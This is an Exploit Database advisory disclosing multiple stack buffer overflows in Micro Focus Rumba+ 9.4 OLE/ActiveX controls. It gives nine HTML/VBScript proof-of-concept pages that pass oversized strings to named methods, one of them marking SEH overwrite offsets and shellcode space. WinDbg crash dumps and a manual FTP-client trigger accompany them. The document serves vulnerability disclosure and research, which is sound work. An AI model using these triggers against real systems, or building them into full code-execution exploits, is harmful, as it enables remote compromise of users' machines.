Micro Focus Rumba+ 9.4 – Multiple Stack Buffer Overflow Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2016-05-26
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39857/

• 
  Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities
  
  
  Vendor: Micro Focus
  Product web page: https://www.microfocus.com
  Affected version: 9.4.4058.0 and 9.4.0 SP0 Patch0
  
  Affected products/tools : Rumba Desktop 9.4
  Rumba 9.4 Trace
  Rumba 9.4 APPC Configuration
  Rumba 9.4 AS400 Communications
  Rumba 9.4 AS400 File Transfer
  Rumba 9.4 Communication Monitor
  Rumba 9.4 Engine
  Rumba 9.4 Screen Designer
  Rumba 9.4 Submit Remote Command ;]
  Rumba FTP Client 4.5
  
  Summary: Rumba is a terminal emulation solution with UI (User Interface)
  modernization properties. Rumba and Rumba+ allows users to connect to
  so-called 'legacy systems' (typically a mainframe) via desktop, web and
  mobile.
  
  Desc: Rumba+ software package suffers from multiple stack buffer overflow
  vulnerabilities when parsing large amount of bytes to several functions in
  several OLE controls. An attacker can gain access to the system of the affected
  node and execute arbitrary code.
  
  Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
   Microsoft Windows 7 Professional SP1 (EN)
   Microsoft Windows 7 Enterprise SP1 (EN)
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5327
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5327.php
  
  
  03.02.2016
  
  --
  
  
  ----------------------------
  1. MacroName (WdMacCtl.ocx):
  ----------------------------
  
  <html>
  <object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\SYSTEM\WdMacCtl.OCX"
  prototype= "Function PlayMacro ( ByVal MacroName As String ) As Boolean"
  memberName = "PlayMacro"
  progid = "ObjectXMacro.ObjectXMacro"
  argCount = 1
  
  arg1=String(272, "A") + "BBBB" + String(16, "C") + "DDDD" + "EEEE" + String(14700, "C")
  '^ ^ ^ ^^ ^
  '| | | || |
  '-----------junk---------ds:edx-------padding-------nseh-----seh------------scspace----
  ' 6224 bytes usable space
  
  
  target.PlayMacro arg1 
  
  </script>
  </html>
  
  ===
  
  (1d78.52c): Access violation - code c0000005 (!!! second chance !!!)
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\SysWOW64\ntdll.dll - 
  eax=00000000 ebx=45454545 ecx=74d72a9c edx=42424242 esi=0032ddc0 edi=00000000
  eip=770a15fe esp=0032dd58 ebp=0032ddac iopl=0 nv up ei pl zr na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00000246
  ntdll!NtRaiseException+0x12:
  770a15fe 83c404add esp,4
  0:000> !exchain
  0032e7cc: 45454545
  Invalid exception stack at 44444444
  0:000> d 0032e7cc
  0032e7cc44 44 44 44 45 45 45 45-43 43 43 43 43 43 43 43DDDDEEEECCCCCCCC
  0032e7dc43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0032e7ec43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0032e7fc43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0032e80c43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0032e81c43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0032e82c43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0032e83c43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0:000> kb
  ChildEBP RetAddrArgs to Child
  WARNING: Stack unwind information not available. Following frames may be wrong.
  0032ddac 77147415 0032ddc0 0032de10 00000000 ntdll!NtRaiseException+0x12
  0032e0e0 7711071a 45454545 fffffffe fffffffe ntdll!RtlRemoteCall+0x236
  0032e130 770db3f5 45454545 0000004d 0032e82c ntdll!RtlUlonglongByteSwap+0x1327a
  0032e1b0 77090133 0032e1c8 0032e218 0032e1c8 ntdll!LdrRemoveLoadAsDataTable+0xcac
  0032e7b0 41414141 42424242 43434343 43434343 ntdll!KiUserExceptionDispatcher+0xf
  0032e7b4 42424242 43434343 43434343 43434343 0x41414141
  0032e7b8 43434343 43434343 43434343 43434343 0x42424242
  0032e7bc 43434343 43434343 43434343 44444444 0x43434343
  0032e7c0 43434343 43434343 44444444 45454545 0x43434343
  0032e7c4 43434343 44444444 45454545 43434343 0x43434343
  0032e7c8 44444444 45454545 43434343 43434343 0x43434343
  0032e7cc 45454545 43434343 43434343 43434343 0x44444444
  0032e7d0 43434343 43434343 43434343 43434343 0x45454545
  0032e7d4 43434343 43434343 43434343 43434343 0x43434343
  0032e7d8 43434343 43434343 43434343 43434343 0x43434343
  0032e7dc 43434343 43434343 43434343 43434343 0x43434343
  
  
  -----------------------------
  2. NetworkName (iconfig.dll):
  -----------------------------
  
  <html>
  <object classid='clsid:E1E0A940-BE28-11CF-B4A0-0004AC32AD97' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\system\iconfig.dll"
  prototype= "Property Let NetworkName As String"
  memberName = "NetworkName"
  progid = "ObjectXSNAConfig.ObjectXSNAConfig"
  argCount = 1
  arg1=String(9000000, "B")
  target.NetworkName = arg1
  </script>
  </html>
  
  ===
  
  STATUS_STACK_BUFFER_OVERRUN encountered
  (2958.3e0): Break instruction exception - code 80000003 (first chance)
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\windows\syswow64\kernel32.dll - 
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\windows\SysWOW64\MSVCR120.dll - 
  eax=00000000 ebx=616c4480 ecx=76280484 edx=003ee021 esi=00000000 edi=003ee794
  eip=76280265 esp=003ee268 ebp=003ee2e4 iopl=0 nv up ei pl zr na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00000246
  kernel32!GetProfileStringW+0x12cc9:
  76280265 ccint 3
  ..
  0:000> d esp+400
  003ee66842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  003ee67842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  003ee68842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  003ee69842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  003ee6a842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  003ee6b842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  003ee6c842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  003ee6d842 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42BBBBBBBBBBBBBBBB
  0:000> u
  kernel32!GetProfileStringW+0x12cc9:
  76280265 ccint 3
  76280266 c745fcfeffffffmov dword ptr [ebp-4],0FFFFFFFEh
  7628026d e9c574feffjmp kernel32!UnhandledExceptionFilter+0x40 (76267737)
  76280272 33c0xor eax,eax
  76280274 40inc eax
  76280275 c3ret
  76280276 8b65e8mov esp,dword ptr [ebp-18h]
  76280279 68090400c0push0C0000409h
  0:000> dds
  003ee6e842424242
  003ee6ec42424242
  003ee6f042424242
  003ee6f442424242
  003ee6f842424242
  003ee6fc42424242
  003ee70042424242
  003ee70442424242
  003ee70842424242
  003ee70c42424242
  003ee71042424242
  003ee71442424242
  003ee71842424242
  003ee71c42424242
  003ee72042424242
  003ee72442424242
  003ee72842424242
  003ee72c42424242
  003ee73042424242
  003ee73442424242
  003ee73842424242
  003ee73c42424242
  003ee7401e4cd74b
  003ee744003ec760
  003ee7487594d140 OLEAUT32!DispCallFunc+0xa6
  003ee74c006a191c
  003ee75002f50024
  003ee754006a1a7c
  003ee758001df530
  003ee75c003ee754
  003ee760003ee7f0
  003ee7647594cfba OLEAUT32!VarCmp+0xd35
  
  
  ------------------------
  3. CPName (iconfig.dll):
  ------------------------
  
  <html>
  <object classid='clsid:E1E0A940-BE28-11CF-B4A0-0004AC32AD97' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\system\iconfig.dll"
  prototype= "Property Let CPName As String"
  memberName = "CPName"
  progid = "ObjectXSNAConfig.ObjectXSNAConfig"
  argCount = 1
  arg1=String(8212, "A")
  target.CPName = arg1
  </script>
  </html>
  
  
  ------------------------------
  4. PrinterName (ProfEdit.dll):
  ------------------------------
  
  <html>
  <object classid='clsid:09A1C362-676A-11D2-A0BE-0060B0A25144' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll"
  prototype= "Property Let PrinterName As String"
  memberName = "PrinterName"
  progid = "ProfileEditor.PrintPasteControl"
  argCount = 1
  arg1="http://zeroscience.mk/zslrss.xml"
  'or string 10000 bytes
  target.PrinterName = arg1
  </script>
  </html>
  
  ===
  
  (23f4.4c2c): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll - 
  eax=baadf00d ebx=5fab4b10 ecx=baadf00d edx=003857b8 esi=0030e7b8 edi=0030e66c
  eip=5fa63a60 esp=0030e5fc ebp=0030e604 iopl=0 nv up ei pl nz ac pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010216
  ProfEdit+0x13a60:
  5fa63a60 c6808401000000mov byte ptr [eax+184h],0ds:002b:baadf191=??
  
  
  ----------------------
  5. Data (FtxBIFF.dll):
  ----------------------
  
  <html>
  <object classid='clsid:2E67341B-A697-11D4-A084-0060B0C3E4EC' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll"
  prototype= "Function WriteRecords ( ByVal Row As Long ,ByVal Col As Long ,ByVal DataType As Long ,ByVal Data As String ) As Boolean"
  memberName = "WriteRecords"
  progid = "FTXBIFFLib.AS400FtxBIFF"
  argCount = 4
  arg1=2
  arg2=3
  arg3=r
  arg4=String(100000, "A")
  target.WriteRecords arg1 ,arg2 ,arg3 ,arg4 
  </script>
  </html>
  
  ===
  
  (1164.1dd4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll - 
  eax=00000000 ebx=56c0a928 ecx=757bd0c4 edx=fffff000 esi=baadf00d edi=0036eba8
  eip=56bf3011 esp=0033ddc8 ebp=0033ddd4 iopl=0 nv up ei pl zr na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010246
  FtxBIFF+0x3011:
  56bf3011 837e2020cmp dword ptr [esi+20h],20h ds:002b:baadf02d=????????
  0:000> d esp
  0033ddc8f0 dd 33 00 0d f0 ad ba-0d f0 ad ba 48 eb 36 00..3.........H.6.
  0033ddd82c 83 bf 56 02 00 00 00-03 00 00 00 00 00 00 00,..V............
  0033dde8f0 dd 33 00 40 eb 36 00-41 41 41 41 41 41 41 41..3.@.6.AAAAAAAA
  0033ddf841 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0033de0841 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0033de1841 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0033de2841 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0033de3841 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  
  
  -----------------------------------
  6. Serialized (NMSecComParams.dll):
  -----------------------------------
  
  <html>
  <object classid='clsid:30A01218-C999-4C40-91AE-D8AE4C884A9B' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll"
  prototype= "Property Let Serialized As String"
  memberName = "Serialized"
  progid = "NMSECCOMPARAMSLib.SSL3"
  argCount = 1
  arg1=String(1333200, "A")
  target.Serialized = arg1
  </script>
  </html>
  
  ===
  
  (1508.1a9c): Stack overflow - code c00000fd (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll - 
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll - 
  eax=00362000 ebx=1003efa0 ecx=001d369c edx=0045e600 esi=0045e8b0 edi=0045e6d4
  eip=100366b7 esp=0045e640 ebp=0045e684 iopl=0 nv up ei pl nz na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010206
  NMSecComParams!DllUnregisterServer+0x4617:
  100366b7 8500testdword ptr [eax],eaxds:002b:00362000=00000000
  
  
  ---------------------------------
  7. UserName (NMSecComParams.dll):
  ---------------------------------
  
  <html>
  <object classid='clsid:3597EAD7-8E7A-4276-AF12-40F8BD515921' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll"
  prototype= "Property Let UserName As String"
  memberName = "UserName"
  progid = "NMSECCOMPARAMSLib.FirewallProxy"
  argCount = 1
  arg1=String(1026000, "A")
  target.UserName = arg1
  </script>
  </html>
  
  ===
  
  (1620.16bc): Stack overflow - code c00000fd (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll - 
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll - 
  eax=000d2000 ebx=1003edd0 ecx=00000000 edx=003e390a esi=001ceba8 edi=001cea5c
  eip=100366b7 esp=001ce9e4 ebp=001cea0c iopl=0 nv up ei pl nz na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010206
  NMSecComParams!DllUnregisterServer+0x4617:
  100366b7 8500testdword ptr [eax],eaxds:002b:000d2000=00000000
  
  
  -------------------------
  8. LUName (ProfEdit.dll):
  -------------------------
  
  <html>
  <object classid='clsid:5A01664E-6CF1-11D2-A0C2-0060B0A25144' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll"
  prototype= "Property Let LUName As String"
  memberName = "LUName"
  progid = "ProfileEditor.MFSNAControl"
  argCount = 1
  arg1=String(14356, "A")
  target.LUName = arg1
  </script>
  </html>
  
  ===
  
  (f10.1cb8): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll - 
  eax=baadf00d ebx=55944ba4 ecx=baadf00d edx=005c32b0 esi=0022e738 edi=0022e5ec
  eip=558f3a60 esp=0022e578 ebp=0022e580 iopl=0 nv up ei pl nz ac pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010216
  ProfEdit+0x13a60:
  558f3a60 c6808401000000mov byte ptr [eax+184h],0ds:002b:baadf191=??
  
  
  -------------------------
  9. newVal (FTPSFtp.dll):
  -------------------------
  
  <html>
  <object classid='clsid:ACBBEC6D-7FD4-44E3-B1A4-B442D40F5818' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Program Files (x86)\Micro Focus\Micro Focus Utilities\FTP Client\FTPSFtp.dll"
  prototype= "Sub Load ( ByVal newVal As String )"
  memberName = "Load"
  progid = "FTPSFTPLib.SFtpSession"
  argCount = 1
  arg1=String(13332, "A")
  target.Load arg1 
  
  </script>
  </html>
  
  ===
  
  STATUS_STACK_BUFFER_OVERRUN encountered
  (608.f74): Break instruction exception - code 80000003 (first chance)
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\syswow64\kernel32.dll - 
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\SysWOW64\MSVCR120.dll - 
  eax=00000000 ebx=10027e44 ecx=757d047c edx=0039dc45 esi=00000000 edi=0039e594
  eip=757d025d esp=0039de8c ebp=0039df08 iopl=0 nv up ei pl zr na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00000246
  kernel32!GetProfileStringW+0x12cc1:
  757d025d ccint 3
  
  
  ----------------------
  10. Host (FTP Client):
  ----------------------
  
  For the RUMBA FTP Client PoC, copy ~300 bytes array and paste it in the Host field when creating a new session.